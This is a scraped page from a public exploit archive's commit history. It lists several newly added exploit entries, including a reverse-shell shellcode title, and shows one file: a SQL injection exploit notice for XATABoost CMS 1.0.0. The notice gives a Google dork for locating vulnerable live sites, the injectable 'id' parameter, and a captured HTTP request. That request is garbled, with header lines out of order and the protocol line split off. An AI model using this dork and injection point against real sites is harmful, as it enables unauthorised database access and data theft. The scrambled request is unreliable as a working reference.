2d5885c58b
5 changes to exploits/shellcodes 2345 Security Guard 3.7 - '2345NsProtect.sys' Denial of Service FxCop 10/12 - XML External Entity Injection Microsoft Windows FxCop 10/12 - XML External Entity Injection Apple Safari 3.2.x - 'XXE' Local File Theft Apple Safari 3.2.x - XML External Entity Local File Theft Open-AudIT Community - 2.2.0 – Cross-Site Scripting Open-AudIT Community 2.2.0 - Cross-Site Scripting Monstra CMS 3.0.4 - Remote Code Execution XATABoost 1.0.0 - SQL Injection Linux/x86 - Reverse TCP (127.0.0.1:4444/TCP) Shell Shellcode (96 Bytes)
21 lines
No EOL
793 B
Text
21 lines
No EOL
793 B
Text
# Exploit Title: XATABoost CMS Sql Injection
|
|
# Google Dork: inurl:php?id= Powered by XATABOOST
|
|
# Date: 02.01.2018
|
|
# Exploit Author: MgThuraMoeMyint
|
|
# Vendor Homepage: http://www2.xataboost.com
|
|
# Version: 1.0.0
|
|
# Tested on: Kali Linux
|
|
# SQL Injection Type: Union Based
|
|
# Example URL: http://localhost/news.php?id=[Injection Point]
|
|
|
|
Accept-Encoding: gzip, deflate
|
|
Referer: http://localhost/news.php?id=[Injection Point]
|
|
Connection: keep-alive
|
|
GET /xata/nonprofit/000026/css/custom.css.php?x=1c383cd30b7c298ab50293adfecb7b18
|
|
HTTP/1.1
|
|
Host: localhost
|
|
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/20100101 Firefox/52.0
|
|
Accept: text/css,*/*;q=0.1
|
|
Accept-Language: en-US,en;q=0.5
|
|
Accept-Encoding: gzip, deflate
|
|
Referer: http://localhost/news.php?id=[Injection Point] |